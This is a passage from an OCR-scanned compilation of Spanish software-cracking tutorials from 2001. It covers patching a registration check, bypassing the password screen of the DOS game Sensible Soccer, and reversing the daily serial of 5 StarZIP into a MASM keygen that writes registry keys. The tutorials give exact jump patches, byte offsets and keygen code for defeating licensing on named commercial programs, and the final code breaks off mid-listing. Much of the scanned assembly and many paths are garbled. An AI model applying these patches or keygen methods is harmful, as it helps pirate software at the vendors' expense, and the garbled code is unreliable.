:004C73F0 47 inc edi 

:004C73F1 68E8030000 push 000003E8 


* Reference To: KERNEL32.Sleep, Ord:0000h 


:004C73F6 E835FBF3FF Call 00406F30 


* Referenced by a Unconditional Jump at Address :004C73E5 


:004C73FB 85F6 test esi, esi 
:004C73FD 7D05 jge 004C7404 
:004C73FF 83FFOA cmp edi, 0000000A 
:004C7402 7CE3 31 004C73E7 


* Referenced by a Conditional Jump at Address :004C73FD 


:004C7404 85F6 test esi, esi 
:004C7406 7C36 31 004C743E 


y para evitar esta rutina vamos a saltarla desde :004C73E5 hasta :004C7404 mediante el siguiente cambio: 
:004C73E5 JMP 004C73FB cambiaa :004C73E5 JMP 004C7404 
asi que en el OffSet 000C69E5 pondremos EB 1D 


Bueno ahora si podemos correr la aplicacion varias veces mientras hacemos pruebas, sin que nos esten demorando. 


Ahora cargamos la aplicacion con el W32dasm98 nos vamos al menu Re fs, y despues al submenu String 
Data References, buscamos la cadena de texto LD2KReg. ini y le damos dos veces con el mouse, 
inmediatamente nos manda a la direccion 


* Possible StringData Ref from Code Obj ->"LD2KReg.ini" 
| 

:004A45FF B97C464A00 mov ecx, 004A467C 

:004A4604 B201 mov dl, 01 

:004A4606 A1FC9B4700 mov eax, dword ptr [00479BFC] 
:004A460B E89456FDFF call 00479CA4 

:004A4610 8BD8 mov ebx, eax 

:004A4612 6A00 push 00000000 

:004A4614 8D45FC lea eax, dword ptr [ebp-04] 

:004A4617 50 push eax 


* Possible StringData Ref from Code Obj ->"Register" 
:004A4618 B990464A00 mov ecx, 004A4690 


* Possible StringData Ref from Code Obj ->"Register" 


:004A461D BA90464A00 mov edx, 004A4690 
:004A4622 8BC3 mov eax, ebx 

:004A4624 8B30 mov esi, dword ptr [eax] 
:004A4626 FF16 call dword ptr [esi] 
:004A4628 8BC3 mov eax, ebx 

:004A462A ESEDE9F5FF call 0040301C 

:004A462F 8D45F8 lea eax, dword ptr [ebp-08] 
:004A4632 ESF9F9FFFF call 00444030 

:004A4637 8B55F8 mov edx, dword ptr [ebp-08] 
:004A463A 8B45FC mov eax, dword ptr [ebp-04] 
:004A463D E816FAF5FF call 00404058 

:004A4642 7504 jne 00444648 

:004A4644 B301 mov bl, 01 

:004A4646 EBO2 jmp 004A464A 


* Referenced by a Conditional Jump at Address :004A4642 


:004A4648 33DB xor ebx, ebx 


* Referenced by a Unconditional Jump at Address :004A4646 


:004A464A 33C0 xor eax, eax 

:004A464C 5A pop edx 

:004A464D 59 pop ecx 

:004A464E 59 pop ecx 

:004A464F 648910 mov dword ptr fs: [eax], edx 
:004A4652 686C464A00 push 004A466C 


* Referenced by a Unconditional Jump at Address :004A466A 


:004A4657 8D45F8 lea eax, dword ptr [ebp-08] 
:004A465A BA02000000 mov edx, 00000002 
:004A465F E870F6F5FF call 00403CD4 

:004A4664 C3 ret 


observen que antes de salir de esta rutina, existe un salto condicional que modifica algunos parametros, este salto 
se encuentra en la direccion :004A4642, la diferencia entre saltar o no saltar es que en el primer caso el registro 


EBX se iguala a cero en el otro caso se iguala a uno, esta es la bendera que se utiliza para validar el registro de la 
aplicacion, asi que cambiaremos 


:004a4642 75 04 por :004a4642 75 00 


y todo arreglado 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter docente, 


no pretende violar ninguna ley vigente, el autor no se hace responsable del uso, 
manejo o practicas inadecuadas del analisis presentado ([:0) 
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CRACKER: Saccopharynx FECHA: 02/10/2001 


INTRODUCCION 


Hola a todos: Este es mi primer tutorial de cracking y estoy seguro que 
no el último. Es por eso que quiero agradecer a: Karpoff, por tanta 
dedicación a este sitio; Dek_Oin y Black Fenix, por sus excelentes 
tutoriales; Pr(fFeSoR X, por el gran trabajo realizado con sus 
compilaciones, y también al resto de los crackers que aportan material al 
sitio. A ti, quién estás leyendo esto, como yo he leído por ahí, te digo: 


"escribe tutoriales para que el conocimiento no se pudra en tu cabeza". 
La información es PODER. De nosotros depende que todo esto sea posible. 
Basta de chachara y... 


| AL ATAKE 


INTRO 


Bueno después de leer y practicar en base a varios tutoriales, decidí hacer algo 
por cuenta propia. Pero mi primer tutorial debería ser algo especial, por lo 
menos para mi, ya que no me conformaría con un simple cracking igual a 
cualquiera que haya leído, porqué sino demostraría que no he aprendido nada y 
que me estoy copiando. A la vez debería seleccionar una victima acorde a mi 
nivel, que por ahora esta lejos del de un experto. Entonces como dice arriba la 
víctma fue el Sensible Soccer v 1.1. 


PRESENTANDO A LA VICTIMA 


Es un viejo juego para DOS del año 1993. No es gran cosa pero le tengo un cariño 
especial. Por error una vez lo borré del disco rígido Junto con el crack, y 
luego no lo conseguí por ningún lugar. Un día se me ocurrió buscarlo en internet 
y conseguí el juego en el sitio arriba mencionado. Pero había un problema, el 
juego lo conseguí, pero no los passwords para ingresar a él ni el crack. 
Entonces que mejor que crackearlo yo para ir tomando experiencia. En un 
principio parecía una víctima fácil, pero no fue así. Sigan leyendo y verán 
porqué. 


MANOS A LA OBRA 


Básicamente se me presentaron 2 problemas antes de poder crackearlo: 


1) El empaquetado: 


Abrí el soc.exe (ejecutable del juego) con el W32dasm, y como se trata de un 
juego de DOS, en lugar de las APIs de las DLLs, utiliza interrupciones. La 
interrupción típica para salir nuevamente al DOS es la 21, servicio 4c. Por lo 
tanto en el código debería econtrar las líneas: 


mov ah, 4c 
int 21 


Pero no fue así. En ningún lugar del código existían estas líneas. Entonces ¿qué 
estaba pasando?. Ataqué por otro lado: Con el viejo y querido Norton Comander de 
DOS apreté F3 para ver si encontraba alguna pista en soc.exe. Y así fue. Cerca 
del encabezado de este ejecutable se puede leer pklite y pkware. Pkware es al 
empresa que desarrolló el famoso pkzip, pero hasta entonces desconocía que era 
el pklite. 


Busqué en internet y descubrí que pklite es un compresor de EXEs que a 
diferencia del pkzip y del winzip comprime los ejecutables pero estos se pueden 
seguir ejecutando, reduciendo enórmemente su tamaño. Existen dos versiones de 
pklite, una para DOS y otra para Windows. Se pueden descargar de: 


www .pkware.com 


ftp.pkware.com 


Para este caso necesitamos la de DOS. Usamos el mismo pklite para descomprimir 
al archivo soc.exe y vemos que su tamaño se incrementó Casi en un 300%. Ahora 
si, volvemos a abrir el soc.exe (ya descomprimido) con el W32dasm y buscamos 


donde se utiliza la interrupción 21, servicio 4c. Y siiiiiiiiii. Encontramos que 
se está usando en 3 lugares. 


A esta altura se preguntarán porqué buscar por la interrupción 21, función 4c. 
Es simple: Cuando ingresamos mal el password 3 veces, salimos al DOS, entonces, 
mi intención es investigar el código cercano a estas líneas (las dos de arriba), 
en Cada uno de los tres lugares en donde aparecen, para encontrar algún salto 
sospechoso y Cambiarlo para evitar salir al DOS. Bueno, no pierdan tiempo los 
saltos sospechosos no están cerca de estas interrupciones. Debemos descubrir 
estos saltos de una forma más fácil. Luego veremos como. Programa desempacado, 
primer problema resuelto. 


2) La memoria convencional: 


La mejor forma de poder descubrir donde están los saltos que debemos parchear 
para burlar el ingreso del password es usando el SoftICE. Para eso debemos 
correr el Sensible Soccer desde Windows. El problema de este juego es que 
requiere mucha memoria convencional libre (aproximadamente 590 Kb.). Cuando 
abría una ventana de DOS desde Windows y ejecutaba mem /c/p no podía lograr 
tener más de 550 Kb. Tenía bien configurado el config.sys y el autoexec.bat, 
pero no podía saber que pasaba. De esta forma no podía debuggear el juego porque 
cuando ejecutaba soc.exe desde la ventana de DOS al no tener 590 Kb. de memoria, 
el juego volvía al DOS si poder ejecutarlo. Entonces mis alternativas eran las 
siguientes: 


A) Bootear con un diskette de arranque y debuggear el juego con un debugger de 
DOS. 


B) Intentar de alguna manera tener más de 590 Kb. 


A) Los debuggers de DOS me parecieron todos muy malos comparados con el SoftICE. 
Con ninguno pude lograr debuggear el juego. Ni siquiera con el SoftICE de DOS 
versión 2.80, porque el patch para procesadores PENTIUM no me fucionó. Resignado 
tuve que optar por la opción B, sio si. 


B) Investigué nuevamente que pasaba. Cuando ejecutaba mem /c/p noté que el 
himem.sys ocupaba en la memoria 46 preciosos Kbs., los cuales me venian 
bárbaros. Pero lo más sorprendete es que el tamaño del himem.sys es de 33 Kb. 
(en disco). Entoncés ¿Por qué ocupaca más en memoria? Busqué en internet hasta 
llegar a una página de Microsoft, en la cual me enteré que esto que me pasaba 
era un BUG de Windows 95 OSR2 (versión Spanish y otras más). 


Según esta página de Microsoft la versión en inglés no presenta el problema. 
Afortunadamente había un patch para bajar. Lo bajé, lo corrí, reinicie, y logré 
tener por primera vez en la historia de mi computadora, 610 Kb. libres de 
memoria convencional DESDE DE WINDOWS. Este patch actualiza el IO.SYS (para 
poder acceder a memoria alta en MS-DOS). Con este patch instalado el himem.sys 
solo ocupa 1 Kb. en memoria. Si alguién tiene problemas de memoria aquí les dejo 
mi autoexec.bat, config.sys y el link de donde bajar el patch para solucionar el 
problema del himem.sys. 


Mi Autoexec.bat: 


path=c:1borlandcYbin;¿c:Anc;c:Ainu;¿c:iwindowslcommand;c:XtcYbin; 


mode con codepage prepare=((850) C:1WINDOWSXCOMMAND ega.cpi) 
mode con codepage select=850 

PROMPT $p$g 

Qecho off 

C:AWINDOWSXCOMMANDYCHOICE CARGO EL SOFT-ICE /t:n,5 

if errorlevel 2 goto SEGUIR 

e: ASOFTICENWINICE.EXE 

: SEGUIR 


Mi Config.sys: 


device=c:Xwindowslhimem.sys 
devicehigh=c:windowslemm386.exe noems I=e000-efff 
dos=high,umb 
devicehigh=c:1windowslXcommandlYdrvspace.sys /move 
devicehigh=C:AWINDOWSXCOMMANDAdisplay.sys con=(ega, ,1) 
Country=054,850,C:AWINDOWSXCOMMANDA country .sys 


Link del patch: 


http: //support .microsoft .com/support/kb/articles/q170/4/56.asp 
(De aquí deberán bajar el archivo lIosysspa.exe si tienen la 
versión en español de Windows 95). 


Algunas versiones de Windows 98 presentan el mismo problema. Antes de instalar 
el patch asegurarase de que el himem.sys ocupa más de 1 Kb. en memoria. Problema 
resuelto. 


Ahora por fin al cracking. Cómo dije antes, tenemos que averiguar donde están 
los saltos que debemos parchear para burlar el ingreso del password. Bien: 


1) Abrimos una ventana de DOS y vamos al directorio donde instalamos el juego, y 
lo ejecutamos tipeando soc.exe seguido de enter. 


2) Cuando llegamos a la pantalla de ingreso del password, tipeamos cualquier 
password y antes de dar enter presionamos CTRL+D para ir al SoftICE. Aparecemos 
cerca de las direcciones de memoria: 


31£f1:0401 ec IN AL, DX 

3ff1:0402 2408 AND AL,08 

3f£f1:0404 74fb JZ 0401 

3ff1:0457 C706255F000A MOV WORD PTR [5F25], 0A00 (*) 


Quiero aclarar que estas direcciones no se corresponden directamente con las de 

W32Dasm. No son las mismas. No se porqué. Si alguien lo sabe por favor dígamelo. 
Por lo tanto para localizarlas en W32Dasm, y poder estudiar el código, busqué la 
Cadena: MOV WORD PTR [5F25], 0A00 


La cuarta aparición de esta cadena es la misma de la dirección 3ff1:0457. Como 
se observa, las direcciones de memoria no se ven iguales en SoftICE y W32Dasm: 


:0004.6127 C706255F00DA mov word ptr [5F25], 0400 


SoftICE: 3ff1:0457 
W32Dasm: 0004.6127 


Ya localizamos el código en el “W32Dasm. Ahora vamos a analizarlo. También 
podemos analizarlo en Softice, pero nos conviene en W32Dasm para obtener los 
OFFSETS donde aplicaremos los parches de forma más rápida. Un poco más abajo 
podemos ver el siguiente código: 


:0004.616B £323E00000D cmp word ptr [0000] 


En la línea 0004.616B hay una comparación contra el caracter D en hexa. D en 
hexa es 13, y el 13 en ascii es el ENTER. Esto quiere decir que cuando damos 
enter en la pantalla del password se produce un salto a la dirección 61AE: 


0004.6170 743c je 61AE 


Vamos hasta esta dirección y vemos: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Address: 


1:0004.6170(C) 

| 

:0004.61B1 SEDS mov ds, ax 

:0004.61B3 C?06206SFEFF mov word ptr [6820], FFFE 
:0004.61B9 SBOE3BSF mow cx, [5F3B] 

:0004.61BD 0BC9 DE CX, ER 

:0004.61BF 7503 jne 6104 

:0004.61C1 ESEAFE jmp S5DAE 


en la línea 0004.61BD hay un OR. Este OR compara que nuestro password no sea 
solo un enter (o sea tenga al menos 1 caracter o el largo sea mayor a cero). Si 
es solo un ENTER no comprueba si el password es válido o no, y asume que no lo 
es produciendo u salto a 0004.5DAE (nos hace ingresar el password otra vez). 
[Pero si ingresamos algo vemos que continua en 0004.61C4: 


* Referenced by a (U)inconditional or (Cjonditional Jump at Address: 
|:0004.61BF(C) 
| 


:0004.61C04 BEZ95F mov si, 5F29 
:0004.61C07? 800420 add byte ptr [si], 20 
:0004.61CA 46 inc si 

:0004.61CB E2FA loop 6107 

:0004.61CD Có60400 mov byte ptr [sil], 00 
:0004.61D0 S8E060424 mov es 2404 
:0004.61D7? SB3E3DSF mov di, [5F3D] 
:0004.61DB SBOE3BSF mov cx, [5F3B] 
:0004.61DF F3 repz 

:0004.61E0 26 cmpsb 

:0004.61E1l 7403 je 6lE6 

:0004.61E3 ESCSFEB jmp 5DAE 


* Referenced by a (U)inconditional or (Cjonditional Jump at Address: 


1:0004.61E1(C) 

| 

:0004.61E6 C?062068FDFF mov word ptr [6820], FFFD 
:0004.61EC CB ret f 


Entre la líneas 0004.61D4 y 0004.61E0 se compara nuestro password con el 
correcto. Si lo ingresamos mal saltamos al mismo lugar que si hubiésemos dado 
solo ENTER (Jjmp 5DAE) . Pero si el password es el correcto vemos que salta a: 
0004.61E6. Entonces debemos invertir este último salto. ¿Cómo? Es fácil. 


Primero debemos ubicar el OFFSET donde se produce el salto dentro del archivo. 
Para esto hacemos doble click sobre la línea 0004.61E1l. Veremos abajo de todo, 
en el W32Dasm, que este offset es: 


000361Elh 


Una vez que tenemos el offset debemos abrir soc.exe con un editor hexadecimal e 
ir a este offset. Yo use el HexWorkShop, pero cuando fui hasta el offset 
indicado (Edit->goto), descubrí que el código no era el mismo. No se porqué los 
ofísets no se corresponden de W32Dasm a HexWorkShop con este juego. Por lo tanto 
no recomiendo buscar por offset para crackear este juego. La mejor alternativa 
es buscar por código. El código es la segunda columna en el W32Dasm (la que está 


despues de las direcciones de memoria). Osea si queremos invertir el salto de la 
posición de memoria 0004.61E1l busquemos en el editor hexadecimal la cadena: 


7403E9C8FBC706 (Edit->Find->Hexa) 


Ahora si, lo único que nos falta es cambiar el 74 al principio de esta Cadena 
por un EB, para saltar siempre hacia adelante a la dirección :0004.61E6. Podemos 
cambiar 74 (je->salta si es igual) por 75 (jne->salta si no es igual) pero si 
algún día ingresamos el password correcto por casualidad, lo tomará como 
inválido. Pero al cambiar por EB (jmp->salto incondicional) siempre entrará. 
Luego de hacer estos cambios los guradamos y listo. 


Y para pulirlo más podemos modificar el salto para cuando le damos solamente 
enter sin ingresar el password. Aquí el cambio es un poco más complicado. El 
salto que hay que cambiar es el de la posición: 


0004.61BF 7503 jne 61C4 


Pero no solo debemos cambiar 75 por EB. También 03 por 25. ¿Por qué? Porque 03 
es la cantidad de bytes que el salto va hacer. Si solo salta 3 bytes hacia 
delante Ccaeremos justo en la rutina que compara los passwords, pero si damos 
solo un enter no habrá cedena para comparar contra el password y saben que 
sucede: Se cuelga el Windows y hay que reiniciar el equipo, porque esta rutina 
asume que la longitud de nuestro password es de al menos 1 caracter. Al poner 25 
saltamos 37 bytes hacia delante (37 decimal = 25 en hexa), y Caemos justo en el 
mismo lugar que en el salto anterior (después de la comparación de los 
passwords). En el editor hexa este salto esta una línea más arriba que el 
anterior. Igualmente si no se dan cuenta pueden hacer la búsqueda de código como 
hicimos en el salto anterior. 


Para Calcular que el desplazamiento es de 25 hacia delante debemos tener en 
cuenta que queremos saltar 


desde: 0004.61BF 
hasta: 0004.61E6 


Entonces tomamos una calculadora, la ponemos en modo hexadecimal y hacemos: 


61E6 — (61BF + 02) = 25 


El 02 es el tamaño que ocupa la instrucción de la dirección 0004.61BF, pero como 
la cantidad de bytes a saltar se comienza a contar a partir de la próxima 
instrucción, y no desde la que hace el salto, debemos incrementar 61BF en 02 
para que cuente a partir de 61C1, ya que la instrucción que comienza en 
0004.61BF ocupa 02 bytes. 


Guardar los cambios, comprimir el soc.exe para que ocupe menos espacio con el 
comando pklite soc.exe, y si quieren, se pueden generar un crack con algún 
patcher. Ahora si, dando solo enter, o ingresando cualquier cosa ya podemos 
jugar al SS vl.l. 


Bueno aquí se termina el tutorial. Reconozco que se hizo un poco extenso, pero 
valió la pena, ya que en un mismo tutorial no solo aprendimos un poco de 
parchear saltos, sino también de archivos empaquetados y a solucionar un gran 
bug que presenta el sistema operativo de Billy. Tres al precio de uno. 


Ahora si, un saludo grande a Karpoff, Dek_Oin, Black Fenix y PreFeSoR X, que son 


unas bestias del cracking y a todos los que aportan conocimientos a esta página. 
Todos para uno y uno para todos. Hasta la próxima. 


Saccopharynx. 
saccopharynxftyahoo.com 


Karpoff Spanish Tutor: 
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Karpoff Spanish Tutor 2001 


Programa: 5 StarZIP-2001 1.0 

PROTECCION: Un serial distinto para cada día.. 

Objetivo: Registrarnos el día que nos apetezca :-) 

Descripcion: Otro compresor/descompresor, y van... 

Dificultad: Aficionado 

DOWNLOAD: www.pepsoft.com 

Herramientas: Softice,MAsm32. 

CRACKER: CaoS ReptantE FECHA: 18/11/2001 
INTRODUCCION 


Seguramente habréis oído pronunciar la frase "vivir al día", pues el infausto programador de hoy 
también. Lo malo es que a él se le ocurrió la brillante idea de hacer que el serial para registrar este 
programa variara cada día. Yo al principio, creía que el serial cambiaba al efectuar una nueva 
instalación, pero si se busca el serial del programa instalado días antes, se desinstala, se instala de 
nuevo y se vuelve a buscar el serial, se puede ver que es el mismo. Sin embargo si se vuelve a 
buscar al día siguiente, el serial ha variado. Vivir para ver... 


AL ATAKE 


Encontrar el serial es sencillo, mediante el sistema que ya he descrito en otras ocasiones para pillar al programa 
cuando lee el serial chungo que hemos introducido (instrucción s O 1 ffffffff 'serial_chungo' ya 


continuación bpm o bpr de la dirección o direcciones obtenidas). Vamos a parar aquí: 


:004039C9 8BOE mov ecx, dword ptr [esi] 
1:004039CB 8B1F mov ebx, dword ptr [edi] 
|: 004039CD 39D9 cmp ecx, ebx 

1:004039CF 7558 jne 00403A29 

1:004039D1 4A dec edx 

:004039D2 7415 je 004039E9 


:004039D4 8B4E04 mov ecx, dword ptr [esi+04] 


:004039D7 8B5F0O4 mov ebx, dword ptr [edi+04] 


:004039DA 39D9 cmp ecx, ebx 
:004039DC 754B jne 00403A29 
:004039DE 83C608 add esi, 00000008 
:004039E1 83C708 add edi, 00000008 
:004039E4 4A dec edx 

:004039E5 75E2 jne 004039C9 
:004039E7 EBO6 jmp 004039EF 


El problema está en que el programa es teóricamente imparcheable - De eso ya hablaremos otro día ;-) - porque pasa 
un montón de veces por la comprobación comparando cadenas de texto, algunas de las cuales no tienen nada que ver 
con el serial y que unas veces son iguales y otras no. Así que de eso de invertir el salto... nada de nada :-( 


Podemos encontrar el serial hoy y registrar el programa, pero si dejamos el registro para mañana, deberemos repetir 
el proceso. Y por supuesto, nada de pasárselo a un colega para que pueda evaluar el programa sin prisas. ¿Qué 
¡podemos hacer? Se impone mirar el registro. Es una buena práctica la de utilizar el TechFacts en el momento de 
registrarse, así se puede ver al registrar el programa, los cambios que se han efectuado en el registro o en algún 
archivo extraño. En nuestro caso, veremos que se han añadido estas dos claves: 


HKEY_USERSN .DEFAULTASoftwarelPepsoft15StarZIP1RegYUserKey="RELCLZMEZVZKUEFF" 
HKEY_USERSN .DEFAULTASoftwarelPepsoft15StarZIPXRegYUserName="CAOS REPTANTE" 


Por cierto, si ponéis en el Softlce un bex RegCreateKeyExA, podréis ver como las claves que crea el programa 
son: 


HKEY_CURRENT_USERISoftwarelPepsoft15StarZlIP1RegYUserKey="REFLCLZMEZVZKUFF" 
HKEY_CURRENT_USERASoftwarelPepsoftX5StarZIPl1ReglYUserName="CAOS REPTANTE" 


Por lo visto, unas claves generan las otras, lo que no sé es por qué el TechFacts sólo detecta las dos que he 
mencionado en primer lugar. 

Por cierto, para ver esas claves hay que mirar los valores almacenados en la pila, mediante d esp, y a partir de esa 
dirección se van comprobando los valores guardados de cuatro en cuatro bytes (algunos de estos valores 
corresponden a números y otros, a las direcciones donde se hallan los datos que nos interesan). 

Si hacéis la prueba, veréis que el serial que aparece, siempre es el mismo independientemente del día en que 
estemos. Ahora ya tenemos donde agarrarnos :-) Así pues se trata de introducir esos datos en el registro y tendremos 
registrado el programa a nuestro nombre. En primer lugar hay que localizar el punto en el que el programa escribe 
este serial mediante la instrucción s O 1 ffffffff 'RELCLZMEZVZKUEF"' y a continuación bpm o bpr de 


las direcciones obtenidas. Así llegaremos haciendo marcha atrás, a este código: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00496995 (C) 


:0049694E 33C0 xor eax, eax 
:00496950 8A03 mov al, byte ptr [ebx] 


EBX apunta a una cadena que está formada por OFh que es la longitud del serial (siempre comprendida entre un 
mínimo de 15 y la longitud del nombre que como máximo será de 23 caracteres), y "CAOS REPTANTECA" 


(nuestro nombre más las letras que falten hasta 15, a partir de la primera). 


:00496952 8B55F4 mov edx, dword ptr [ebp-0C] 
:00496955 OFB6543AFF movzx edx, byte ptr [edx+tedi-01] 


EBX apunta a una cadena que empieza por 00 y sigue con "5STARZIPv1.0358093027". Pero lo que yo no supe 


ver, es que las nueve últimas cifras no eran constantes. Afortunadamente ByTESCRK ha evitado que metiera la pata 
hasta lo más hondo. Se dió cuenta de que el programa que le había mandado para registrar el programa no 
funcionaba y detectó que se debía a que el programa obtenía los datos del disco duro para completar la generación 
del serial de registro. Justo aquí: 


:00496DF3 E808E5F6FF call 00405300 
:00405300 FF25E4524A00 jmp dword ptr [004A52E4] 


Esto se hace mediante GetVolumelnformationA que es una API que da información de un disco especificado. Los 
parámetros de esta función son ocho: 


19- "C:A" (el disco donde está instalado el programa) 

2%- Una dirección en la que la función escribe el nombre del disco. 
3*- 0104h (la longitud del nombre del disco) 

4%- Una dirección en la que la función escribe el número del disco. 
5%- Una dirección en la que hay la longitud máxima del nombre de 


archivo. 

6%- Una dirección en la que la función escribe el valor de los flags 
del 

sistema de archivos. 

7% Una dirección en la que la función escribe el nombre del sistema 
de 


archivos. 
8%- 0104h (la longitud del nombre del sistema de archivos) 


Esto aunque en inglés, está mejor explicado en la Win32 Programmer's Reference. 


Ahora que ya sabemos el verdadero origen de estos números, continuemos con el código. 


:0049695A 6603C2 add ax, dx 

:0049695D 668945FA mov word ptr [ebp-06], ax 
:00496961 OFBF45FA MOVSX €axX, word ptr [ebp-06] 
:00496965 B917000000 mov ecx, 00000017 

:0049696A 99 cdg 

:0049696B F7F9 idiv ecx 


Va sumando los códigos ASCII de los caracteres de las dos cadenas y los divide por 23 (17h) 


:0049696D B8F4694900 mov eax, 004969F4 


EAX apunta a la cadena "ABCDEFGHIKLMNPORTUVWXYZ". 


:00496972 8A1410 mov dl, byte ptr [eax+edx] 


Coloca en DL la letra que está en la posición determinada por el resto de la división. Ahora vemos por qué divide 
por 23: el resto será un número comprendido entre el O (A) y el 22 (Z). 


:00496975 8D85E8FCEFEEF lea eax, dword ptr [ebp+FEFEFFFCES] 
:0049697B 885001 mov byte ptr [eax+011], dl 


Guarda la letra en la memoria... 


:0049697E C60001 mov byte ptr [eax], 01 


:00496981 
:00496987 
:0049698D 


8D95E8FCFFFF lea 
8D85F4EFDFFEFF lea 


edx, dword ptr [ebp+FFFFFCE8S] 
eax, dword ptr [ebp+FEFFFFDF4] 


E88EC1F6FF call 00402B20 


En este call, va colocando las letras en su lugar. 


:00496992 47 inc edi 
:00496993 43 inc ebx 
:00496994 4E dec esi 
:00496995 75B7 jne 0049694E 


Vuelve al inicio del bucle. 


Ya sabemos lo necesario para hacer un programa que nos registre la aplicación :-) 


Echaremos mano del Masm y crearemos dos archivos: el de recursos rsrc. rc en el que definiremos la ventana y 


los botones, 


y el 5Star.asm en el que escribiremos el código del programa. 


El fichero de recursos podría ser este: 


finclude 


tdefine 


tdefine 


tdefine 


define 


define 


app ICON 


"Xmasm32lincludelresource.h" 


IDD_DIALOG 1000 


IDC_NOMBRE 1001 


IDC_REGIS 1002 


IDC_INFO 1003 


IDC_STATIC -1 


reg.ico 


IDD_DIALOG DIALOG 100,100,129,104 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "CaoS ReptantE" 

FONT 10, "MS Sans Serif" 

BEGIN 
GROUPBOX "Programa", IDC_STATIC,8,6,113,20 
LTEXT "5 StarZIP-2001 1.0",IDC_STATIC,12,14,97,8,ES_CENTER 
GROUPBOX "Website", IDC_STATIC,8,28,113,20 
LTEXT "www.pepsoft.com", IDC_STATIC,12,36,97,8,ES_CENTER 
GROUPBOX "Nombre", IDC_STATIC,8,50,113,27 


EDITTEXT IDC_NOMBRE, 22,60,85,11,ES_AUTOHSCROLL 


PUSHBUTTON "Registrar", IDC_REGIS, 8,84,48,14 
PUSHBUTTON "Información", IDC_INFO, 73,84,48,14 


END 


No parecen necesarias muchas explicaciones. Hemos definido la ventana y los controles que están situados en ella, 
también hemos incluido un archivo de recursos y el icono correspondiente. 


Ahora vamos a por el archivo de código :-) 


Me limito a explicar alguna de las características del código, ya que hay cosas que he comentado en algún otro tuto. 
Si queréis alguna aclaración, podéis darme un toque. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32lincludeNwindows.inc 
include c:imasm32lincludeluser32.inc 

include c:imasm32lincludeladvapi32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm3211libluser32.lib 

includelib c:imasm3211libladvapi32.lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 
IDC_NOMBRE EQU 1001 
IDC_REGIS EQU 1002 
IDC_INFO EQU 1003 


D1gFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 
Operacion PROTO 


.data 

Icono db "app",0 

Iconimage db "app",0 

errorl db: MiErrort",.0 

error2 db "¡Mínimo siete caracteres!",0 

error3 db "¡Fallo en registro!",0 

exitol do "¡Exito!",0 

exito2 db "¡5 StarZIP ha sido registrado!",0 

txtl db "Una vez instalado el 5 StarZIP, es suficiente con pulsar el ",%M 


"botón ""Registrar"" para que el programa quede registrado con el nombre ",A 
"gue se haya introducido previamente.",13,10,13,10,%M 
"Es indiferente el directorio desde el que se ejecute este 
programa.",13,10,13,10,3 
"Saludos de CaoS ReptantE :0)",0 
txt2 db "Información",0 


cadena db 0,"5STARZIPv1.0",12 dup(0),0 


abc db "ABCDEFGHIJKLMNPORTUVWXYZ",0 
hInstance dd O 

hIcon dd 0 

hWnd dd 0 

clave db "SoftwarelPepsoft15StarZIPXReg",0 


subclavel db "UserName",0 
subclave2 db "UserKey",0 


valorl db 25 dup(0),0 
valor2 db 25 dup(0),0 
disco db 4 dup(0),0 
archivo db "5starzip.exe",0 
dff db 0,0 

varios db 255 dup(0),0 
numdisc db 4 dup(0),0 
handle dd ? 

dev dd ? 


De las variables que acabamos de definir, sólo comentaré las últimas: archivo es el nombre del ejecutable que 
emplearemos para saber en que disco está instalado el programa; varios es un campo en el que se pondrán 
sucesivamente algunos de los valores que devuelve las funciones GetFullPath... y GetVolume... , he puesto un solo 
campo y ahí se irán machacando; numdisc es donde se colocará el número del HD; handle es el valor del handle 
de la clave que hemos creado en la instrucción RegCreateKeyExA y que se utiliza a continuación en 
RegSetValueExA; dev es un valor que nos indica si la clave ha sido creada o si ya existía y sólo se ha abierto. En 
nuestro caso no lo utilizamos. 


.code 
start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,ADDR DlgFunc, NULL 
invoke ExitProcess,NULL 


Dl1lgFunc proc hD1g:DWORD, uMsg: DWORD, wParam:DWORD, 1lParam:DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWind, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hIcon,eax 
invoke SendMessage, hD1lg, WM_SETICON, 1,hIcon 


Muestra la ventana con el icono que hemos definido. 


.€lseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


Si cerramos la ventana desde la esquina superior derecha, adiós. 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx, eax 


shr edx,16 


Si hemos pulsado un botón, el programa busca cual ha sido. 


.1f dx==BN_CLICKED 
.1f ax==IDC_INFO 
invoke MessageBox,hDl1g,ADDR txt1,ADDR txt2,MB_ICONINFORMATION 


Si hemos pulsado el de "Información", nos muestra la ventana con el mensaje que hemos definido y el icono 
correspondiente. 


.elseif ax==IDC_REGIS 

invoke GetD1gItemText,hDl1g,IDC_NOMBRE,ADDR valorl,24 

invoke Operacion 

.1f eax==717 

invoke MessageBox,hDl1g,ADDR error2,ADDR errorl,MB_ICONSTOP 

.elseif eax==ERROR_SUCCESS 

invoke MessageBox,hDl1g,ADDR exitol,ADDR 

exito2,MB_ICONEXCLAMATION 

invoke EndDialog,hDl1g,NULL 

.else 
invoke MessageBox,hDl1g,ADDR error1,ADDR error2,MB_ICONSTOP 
invoke EndDialog,hD1g,NULL 

.endif 

ret 


Y si hemos pulsado el de "Registrar", vamos a la subrutina Operacion y al regreso, nos muestra un mensaje de 


éxito o de fracaso. Si el fracaso es debido a que el nombre que hemos introducido tiene menos de siete letras, nos 
deja seguir intentándolo, en los otros casos, cierra el programa. 


.endif 
.endif 
.endif 
ret 


Dl1lgFunc endp 


Operacion proc 
pushad 


Para saber el número de serie del disco en que está instalado el programa, primero hemos de averiguar que disco es. 
Eso lo hacemos con esta función: 


invoke GetFullPathNameA,Offset archivo,255,Offset varios, Offset 
varios+4 


Le damos el nombre del programa "víctima" y el número de caracteres que creemos que puede ocupar, nos devuelve 
el path completo en el campo varios y en varios +4, la dirección del nombre del ejecutable. Se machacarán 


